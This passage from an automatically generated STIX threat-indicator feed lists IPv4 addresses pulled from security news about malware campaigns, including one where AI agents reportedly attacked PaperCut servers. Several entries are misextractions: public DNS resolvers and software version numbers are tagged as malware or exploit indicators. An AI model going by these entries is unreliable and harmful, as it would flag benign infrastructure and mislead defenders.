'8.218.50.207']","pattern_type":"stix","valid_from":"2026-09-14T13:01:36.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/one-click-on-a-malicious-link/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ffb5c69d-e491-4fb2-877b-45d4b44e0999","created":"2026-09-14T09:27:43.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 8.8.8.8","description":"Seen in \"Sandworm-Linked Cyclops Blink Returns With Network Scanning and Packet-Sniffing Capabilities\" (GBHackers). Context: entire framework. The module also uses Google Public DNS at 8.8.8.8 over DNS-over-HTTPS access to resolve transfer-host names,","pattern":"[ipv4-addr:value = '8.8.8.8']","pattern_type":"stix","valid_from":"2026-09-14T09:27:43.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/cyclops-blink-variant/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f0f222d9-4e15-458f-b511-84fa89728a48","created":"2026-09-10T18:49:43.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 45.142.193.132","description":"Seen in \"Hundreds of AI agents helped PaperCut attacker hit 395+ orgs, and some went off script\" (The Register · Security). Context: irm GreyNoise, which traced the campaign’s orchestration to 45.142.193.132 on August 31. “The adversary went from an empty workspace t","pattern":"[ipv4-addr:value = '45.142.193.132']","pattern_type":"stix","valid_from":"2026-09-10T18:49:43.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/security/2026/09/10/hundreds-of-ai-agents-helped-papercut-attacker-hit-395-orgs-and-some-went-off-script/5295650"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4cfaa9e1-9194-4cda-950e-350e3fac09bf","created":"2026-09-10T12:58:10.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 1.0.0.1","description":"Seen in \"Redtail Payload Analysis &#x5b;Guest Diary&#x5d;, (Wed, Sep 9th)\" (SANS Internet Storm Center). Context: ct() calls on TCP port 853 . Destinations included 1.1.1.1, 1.0.0.1, 8.8.8.8, 8.8.4.4, 9.9.9.9, 9.9.9.10, and several additiona","pattern":"[ipv4-addr:value = '1.0.0.1']","pattern_type":"stix","valid_from":"2026-09-10T12:58:10.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33326"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bdebf450-1e07-4d1b-84be-54a7049ddf3c","created":"2026-09-10T12:58:10.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 109.91.184.21","description":"Seen in \"Redtail Payload Analysis &#x5b;Guest Diary&#x5d;, (Wed, Sep 9th)\" (SANS Internet Storm Center). Context: resolver infrastructure. Two addresses, 80.152.203.134 and 109.91.184.21 , did not clearly correspond to known public resolver servi","pattern":"[ipv4-addr:value = '109.91.184.21']","pattern_type":"stix","valid_from":"2026-09-10T12:58:10.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33326"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d6ec9c93-95b4-4fd0-a4aa-acfcadbad58f","created":"2026-09-10T12:58:10.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 1.1.1.1","description":"Seen in \"Redtail Payload Analysis &#x5b;Guest Diary&#x5d;, (Wed, Sep 9th)\" (SANS Internet Storm Center). Context: nal connect() calls on TCP port 853 . Destinations included 1.1.1.1, 1.0.0.1, 8.8.8.8, 8.8.4.4, 9.9.9.9, 9.9.9.10, and several","pattern":"[ipv4-addr:value = '1.1.1.1']","pattern_type":"stix","valid_from":"2026-09-10T12:58:10.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33326"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7ef0a564-afc6-492c-bd45-88788a7a0c6e","created":"2026-09-10T12:58:10.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 80.152.203.134","description":"Seen in \"Redtail Payload Analysis &#x5b;Guest Diary&#x5d;, (Wed, Sep 9th)\" (SANS Internet Storm Center). Context: ons were public DNS resolver infrastructure. Two addresses, 80.152.203.134 and 109.91.184.21 , did not clearly correspond to known pub","pattern":"[ipv4-addr:value = '80.152.203.134']","pattern_type":"stix","valid_from":"2026-09-10T12:58:10.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33326"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3ffb14f4-5a59-44fa-ba45-6afb00fc6114","created":"2026-09-10T12:58:10.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 8.8.4.4","description":"Seen in \"Redtail Payload Analysis &#x5b;Guest Diary&#x5d;, (Wed, Sep 9th)\" (SANS Internet Storm Center). Context: port 853 . Destinations included 1.1.1.1, 1.0.0.1, 8.8.8.8, 8.8.4.4, 9.9.9.9, 9.9.9.10, and several additional addresses. TCP/8","pattern":"[ipv4-addr:value = '8.8.4.4']","pattern_type":"stix","valid_from":"2026-09-10T12:58:10.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33326"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e1dc02ae-ce5c-4df9-8541-8b194441d0e6","created":"2026-09-10T12:58:10.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 8.8.8.8","description":"Seen in \"Redtail Payload Analysis &#x5b;Guest Diary&#x5d;, (Wed, Sep 9th)\" (SANS Internet Storm Center). Context: erified while attempts to reach an external address such as 8.8.8.8 returned Network is unreachable. This design allowed the ma","pattern":"[ipv4-addr:value = '8.8.8.8']","pattern_type":"stix","valid_from":"2026-09-10T12:58:10.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33326"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--195b3fa6-33da-4233-81ac-0240dfa170f7","created":"2026-09-10T12:58:10.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 9.9.9.10","description":"Seen in \"Redtail Payload Analysis &#x5b;Guest Diary&#x5d;, (Wed, Sep 9th)\" (SANS Internet Storm Center). Context: tions included 1.1.1.1, 1.0.0.1, 8.8.8.8, 8.8.4.4, 9.9.9.9, 9.9.9.10, and several additional addresses. TCP/853 is commonly asso","pattern":"[ipv4-addr:value = '9.9.9.10']","pattern_type":"stix","valid_from":"2026-09-10T12:58:10.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33326"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fdecf7ca-83d4-4ba2-825c-131d18e62ec0","created":"2026-09-10T12:58:10.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 9.9.9.9","description":"Seen in \"Redtail Payload Analysis &#x5b;Guest Diary&#x5d;, (Wed, Sep 9th)\" (SANS Internet Storm Center). Context: . Destinations included 1.1.1.1, 1.0.0.1, 8.8.8.8, 8.8.4.4, 9.9.9.9, 9.9.9.10, and several additional addresses. TCP/853 is com","pattern":"[ipv4-addr:value = '9.9.9.9']","pattern_type":"stix","valid_from":"2026-09-10T12:58:10.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33326"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a65c03b7-1026-4ba7-8ed6-3adff301da9e","created":"2026-09-10T05:20:30.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 45.142.193.132","description":"Seen in \"Hackers Deploy Hundreds of AI Agents to Compromise 440 PaperCut Servers\" (GBHackers). Context: he actors utilized infrastructure, including the IP address 45.142.193.132, which GreyNoise had tracked since early July for attacks a","pattern":"[ipv4-addr:value = '45.142.193.132']","pattern_type":"stix","valid_from":"2026-09-10T05:20:30.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-deploy-hundreds-of-ai-agents/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--624b342e-eb4a-4560-8b46-7281da87f83c","created":"2026-09-10T05:20:30.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 45.158.196.75","description":"Seen in \"Hackers Deploy Hundreds of AI Agents to Compromise 440 PaperCut Servers\" (GBHackers). Context: paign orchestration and execution infrastructure IP address 45.158.196.75 Infrastructure used to execute campaign activity File hash","pattern":"[ipv4-addr:value = '45.158.196.75']","pattern_type":"stix","valid_from":"2026-09-10T05:20:30.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-deploy-hundreds-of-ai-agents/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--98a442d9-b6cb-409d-8f87-fa36d5a7d89e","created":"2026-09-09T20:04:27.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 9.20.4.14","description":"Seen in \"Cisco security advisory (AV26-197) – Update 3\" (Canadian Centre for Cyber Security). Context: ewall Adaptive Security Appliance (ASA) – versions prior to 9.20.4.14 Cisco Secure Firewall Threat Defense (FTD) – all versions U","pattern":"[ipv4-addr:value = '9.20.4.14']","pattern_type":"stix","valid_from":"2026-09-09T20:04:27.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Canadian Centre for Cyber Security","url":"https://cyber.gc.ca/en/alerts-advisories/cisco-security-advisory-av26-197"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--43e0c8b8-8915-4c6f-b293-e9b1db1e40f0","created":"2026-09-09T17:46:24.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 62.60.130.193","description":"Seen in \"Scans for Proxmox Servers, (Wed, Sep 9th)\" (SANS Internet Storm Center). Context: ll log failed login attempts with a 401 status code: ::ffff:62.60.130.193 - - [09/09/2026:15:26:14 +0000] \"POST /api2/json/access/tic","pattern":"[ipv4-addr:value = '62.60.130.193']","pattern_type":"stix","valid_from":"2026-09-09T17:46:24.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33324"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f83ed42f-d9be-4f07-a7ab-4cb429400bcb","created":"2026-09-09T14:40:47.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 45.142.193.132","description":"Seen in \"Hackers Use Hundreds of AI Agents to Exploit PaperCut Flaws and Compromise 440 Servers Worldwide\" (Cyber Security News). Context: nfrastructure. The malicious actor operated from IP address 45.142.193.132, which GreyNoise had flagged since early July 2026 for prob","pattern":"[ipv4-addr:value = '45.142.193.132']","pattern_type":"stix","valid_from":"2026-09-09T14:40:47.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/papercut-flaws-compromised-using-ai/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--654a52e2-4de3-46d8-b395-10c6d69897d5","created":"2026-09-09T08:57:51.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 146.103.99.177","description":"Seen in \"Hackers Exploit Critical FortiGate Flaw to Deploy AI-Assisted PivotC2 RAT\" (GBHackers). Context: Incident responders should search for outbound sessions to 146.103.99.177 and 46.151.29.58, inspect the /tmp/ directory for .i.js fil","pattern":"[ipv4-addr:value = '146.103.99.177']","pattern_type":"stix","valid_from":"2026-09-09T08:57:51.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-critical-fortigate-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--333a945f-fa6b-4e9a-a5a6-93f87b610387","created":"2026-09-09T08:57:51.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 46.151.29.58","description":"Seen in \"Hackers Exploit Critical FortiGate Flaw to Deploy AI-Assisted PivotC2 RAT\" (GBHackers). Context: s should search for outbound sessions to 146.103.99.177 and 46.151.29.58, inspect the /tmp/ directory for .i.js files, and review ru","pattern":"[ipv4-addr:value = '46.151.29.58']","pattern_type":"stix","valid_from":"2026-09-09T08:57:51.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-critical-fortigate-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--190e601c-bccd-4151-8ef4-2396e962005f","created":"2026-09-09T07:47:48.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 173.212.244.25","description":"Seen in \"Hackers Turn More Than 3,500 Redis Servers Into Cryptocurrency Miners\" (Cyber Security News). Context: IP addresses 34.166.99.116 , 20.198.10.42 , 213.6.207.123 , 173.212.244.25 Additional observed development and QA targets IP address 2","pattern":"[ipv4-addr:value = '173.212.244.25']","pattern_type":"stix","valid_from":"2026-09-09T07:47:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-turn-redis-servers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bd4c5e13-f66a-4854-868f-f26a2f6cc441","created":"2026-09-09T07:47:48.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 188.245.99.156","description":"Seen in \"Hackers Turn More Than 3,500 Redis Servers Into Cryptocurrency Miners\" (Cyber Security News). Context: f compromise (IoCs):- Type Indicator Description IP address 188.245.99.156 Operator host used for rogue Redis replication, command-and","pattern":"[ipv4-addr:value = '188.245.99.156']","pattern_type":"stix","valid_from":"2026-09-09T07:47:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-turn-redis-servers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--73de89ee-99f3-4931-aa40-e24da550ee1d","created":"2026-09-09T07:47:48.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 194.48.248.105","description":"Seen in \"Hackers Turn More Than 3,500 Redis Servers Into Cryptocurrency Miners\" (Cyber Security News). Context: Recurring WordPress exploitation target IP address and port 194.48.248.105:8081 Earlier open directory linked by cryptocurrency wallet","pattern":"[ipv4-addr:value = '194.48.248.105']","pattern_type":"stix","valid_from":"2026-09-09T07:47:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-turn-redis-servers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dd73559c-fad0-4e0f-be2f-e082033f2894","created":"2026-09-09T07:47:48.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 20.198.10.42","description":"Seen in \"Hackers Turn More Than 3,500 Redis Servers Into Cryptocurrency Miners\" (Cyber Security News). Context: target, ownership unconfirmed IP addresses 34.166.99.116 , 20.198.10.42 , 213.6.207.123 , 173.212.244.25 Additional observed develo","pattern":"[ipv4-addr:value = '20.198.10.42']","pattern_type":"stix","valid_from":"2026-09-09T07:47:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-turn-redis-servers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9ed0c5d3-b905-4721-810e-63dda52f8dca","created":"2026-09-09T07:47:48.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 213.6.207.123","description":"Seen in \"Hackers Turn More Than 3,500 Redis Servers Into Cryptocurrency Miners\" (Cyber Security News). Context: hip unconfirmed IP addresses 34.166.99.116 , 20.198.10.42 , 213.6.207.123 , 173.212.244.25 Additional observed development and QA tar","pattern":"[ipv4-addr:value = '213.6.207.123']","pattern_type":"stix","valid_from":"2026-09-09T07:47:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-turn-redis-servers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fdd64a49-fbfb-4ed6-81fd-0f4dbf47ced0","created":"2026-09-09T07:47:48.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 23.235.223.49","description":"Seen in \"Hackers Turn More Than 3,500 Redis Servers Into Cryptocurrency Miners\" (Cyber Security News). Context: 5 Additional observed development and QA targets IP address 23.235.223.49 Recurring WordPress exploitation target IP address and port","pattern":"[ipv4-addr:value = '23.235.223.49']","pattern_type":"stix","valid_from":"2026-09-09T07:47:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-turn-redis-servers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2d1ed029-d76a-47c2-895b-f882373cb699","created":"2026-09-09T07:47:48.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 34.166.99.116","description":"Seen in \"Hackers Turn More Than 3,500 Redis Servers Into Cryptocurrency Miners\" (Cyber Security News). Context: eused QA or test target, ownership unconfirmed IP addresses 34.166.99.116 , 20.198.10.42 , 213.6.207.123 , 173.212.244.25 Additional","pattern":"[ipv4-addr:value = '34.166.99.116']","pattern_type":"stix","valid_from":"2026-09-09T07:47:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-turn-redis-servers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9dfdafd2-520b-419c-913e-28dcf1f7036f","created":"2026-09-09T07:47:48.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 45.155.102.89","description":"Seen in \"Hackers Turn More Than 3,500 Redis Servers Into Cryptocurrency Miners\" (Cyber Security News). Context: stname> Victim check-in request pattern IP address and port 45.155.102.89:10128 Local mining pool proxy used on the operator host Dom","pattern":"[ipv4-addr:value = '45.155.102.89']","pattern_type":"stix","valid_from":"2026-09-09T07:47:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-turn-redis-servers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6971ee8f-d9ef-41cb-94d9-170062587fe9","created":"2026-09-09T07:47:48.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 47.250.92.230","description":"Seen in \"Hackers Turn More Than 3,500 Redis Servers Into Cryptocurrency Miners\" (Cyber Security News). Context: -controlled hostname resolving to 188.245.99.156 IP address 47.250.92.230 Frequently reused QA or test target, ownership unconfirmed","pattern":"[ipv4-addr:value = '47.250.92.230']","pattern_type":"stix","valid_from":"2026-09-09T07:47:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-turn-redis-servers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bcefd37e-8867-456a-abaf-8cadb09d562b","created":"2026-09-09T07:36:49.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 15.1.10.8","description":"Seen in \"F5 BIG-IP APM Malware Injects a PHP Web Shell Into Memory, Evading Disk Scans\" (The Hacker News). Context: 0 - 17.1.2 17.1.3 16.1.0 - 16.1.6 16.1.6.1 15.1.0 - 15.1.10 15.1.10.8 The patch that fixes this is nearly a year old. Ireland's N","pattern":"[ipv4-addr:value = '15.1.10.8']","pattern_type":"stix","valid_from":"2026-09-09T07:36:49.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/f5-big-ip-apm-malware-injects-php-web.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3022b1c7-6eb3-4991-8fe8-f215b3b92eec","created":"2026-09-09T07:36:49.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 16.1.6.1","description":"Seen in \"F5 BIG-IP APM Malware Injects a PHP Web Shell Into Memory, Evading Disk Scans\" (The Hacker News). Context: .0 - 17.5.1 17.5.1.3 17.1.0 - 17.1.2 17.1.3 16.1.0 - 16.1.6 16.1.6.1 15.1.0 - 15.1.10 15.1.10.8 The patch that fixes this is nea","pattern":"[ipv4-addr:value = '16.1.6.1']","pattern_type":"stix","valid_from":"2026-09-09T07:36:49.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/f5-big-ip-apm-malware-injects-php-web.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6afcf005-1323-49b6-ac39-78de6c848903","created":"2026-09-09T07:36:49.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 17.5.1.3","description":"Seen in \"F5 BIG-IP APM Malware Injects a PHP Web Shell Into Memory, Evading Disk Scans\" (The Hacker News). Context: s. Versions known to be vulnerable Fixed in 17.5.0 - 17.5.1 17.5.1.3 17.1.0 - 17.1.2 17.1.3 16.1.0 - 16.1.6 16.1.6.1 15.1.0 - 15","pattern":"[ipv4-addr:value = '17.5.1.3']","pattern_type":"stix","valid_from":"2026-09-09T07:36:49.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/f5-big-ip-apm-malware-injects-php-web.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c597ce3b-9c78-4ada-b1bb-2a962bd21e4d","created":"2026-09-09T00:00:00.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 45.142.193.132","description":"Seen in \"Agents Gone Wild: An AI-Orchestrated Global Campaign Against PaperCut NG/MF\" (GreyNoise). Context: investigation. GreyNoise has been tracking malicious use of 45.142.193.132 since early July 2026 due to its use for attacks against in","pattern":"[ipv4-addr:value = '45.142.193.132']","pattern_type":"stix","valid_from":"2026-09-09T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GreyNoise","url":"https://www.greynoise.io/blog/ai-orchestrated-campaign-against-papercut-ng-mf"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--22a9bfb0-a39f-4126-8b6d-049cf6dd5b08","created":"2026-09-09T00:00:00.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 45.158.196.75","description":"Seen in \"Agents Gone Wild: An AI-Orchestrated Global Campaign Against PaperCut NG/MF\" (GreyNoise). Context: 45.142.193.132 Used to orchestrate and execute the campaign 45.158.196.75 Used to execute the campaign 528cd4e69ecfa5191adbcf6ef28667","pattern":"[ipv4-addr:value = '45.158.196.75']","pattern_type":"stix","valid_from":"2026-09-09T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GreyNoise","url":"https://www.greynoise.io/blog/ai-orchestrated-campaign-against-papercut-ng-mf"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bc5b87f7-2db8-4084-8e53-38c106401c92","created":"2026-09-08T15:13:35.389Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 20.12.5.3","description":"Seen in \"2026-002: Multiple Vulnerabilities in Cisco Products\" (CERT-EU Advisories). Context: end of software maintenance); all versions 20.12.5 up until 20.12.5.3; all versions 20.12.6 up until 20.12.6.1; all versions 20.1","pattern":"[ipv4-addr:value = '20.12.5.3']","pattern_type":"stix","valid_from":"2026-09-08T15:13:35.389Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"CERT-EU Advisories","url":"https://cert.europa.eu/publications/security-advisories/2026-002/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1dffe763-d448-4ad3-a5ac-d9c7283917e0","created":"2026-09-08T15:13:35.389Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 20.12.6.1","description":"Seen in \"2026-002: Multiple Vulnerabilities in Cisco Products\" (CERT-EU Advisories). Context: s 20.12.5 up until 20.12.5.3; all versions 20.12.6 up until 20.12.6.1; all versions 20.13 (end of software maintenance); all vers","pattern":"[ipv4-addr:value = '20.12.6.1']","pattern_type":"stix","valid_from":"2026-09-08T15:13:35.389Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"CERT-EU Advisories","url":"https://cert.europa.eu/publications/security-advisories/2026-002/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ed678088-5008-49f8-808d-8c47bb344444","created":"2026-09-08T15:13:35.389Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 20.15.4.2","description":"Seen in \"2026-002: Multiple Vulnerabilities in Cisco Products\" (CERT-EU Advisories). Context: (end of software maintenance); all versions 20.15 up until 20.15.4.2; all versions 20.16 (end of software maintenance); all vers","pattern":"[ipv4-addr:value = '20.15.4.2']","pattern_type":"stix","valid_from":"2026-09-08T15:13:35.389Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"CERT-EU Advisories","url":"https://cert.europa.eu/publications/security-advisories/2026-002/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--eb51795a-572d-48c5-8e25-9fb85bb51439","created":"2026-09-08T15:13:35.389Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 20.9.8.2","description":"Seen in \"2026-002: Multiple Vulnerabilities in Cisco Products\" (CERT-EU Advisories). Context: 9 (end of software maintenance); all versions 20.9 up until 20.9.8.2; all versions 20.11 (end of software maintenance); all vers","pattern":"[ipv4-addr:value = '20.9.8.2']","pattern_type":"stix","valid_from":"2026-09-08T15:13:35.389Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"CERT-EU Advisories","url":"https://cert.europa.eu/publications/security-advisories/2026-002/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ea2b81e8-131d-4e26-8504-12bf9b9006b1","created":"2026-09-08T12:10:57.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 146.103.127.44","description":"Seen in \"Hackers Disable Endpoint Protection and Deploy Sliver Across Compromised Windows Domain\" (Cyber Security News). Context: rd-tier fallback address, designated hunt-only IPv4 address 146.103.127.44 Historical operator-used address from April 2026, designate","pattern":"[ipv4-addr:value = '146.103.127.44']","pattern_type":"stix","valid_from":"2026-09-08T12:10:57.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Cyber Security 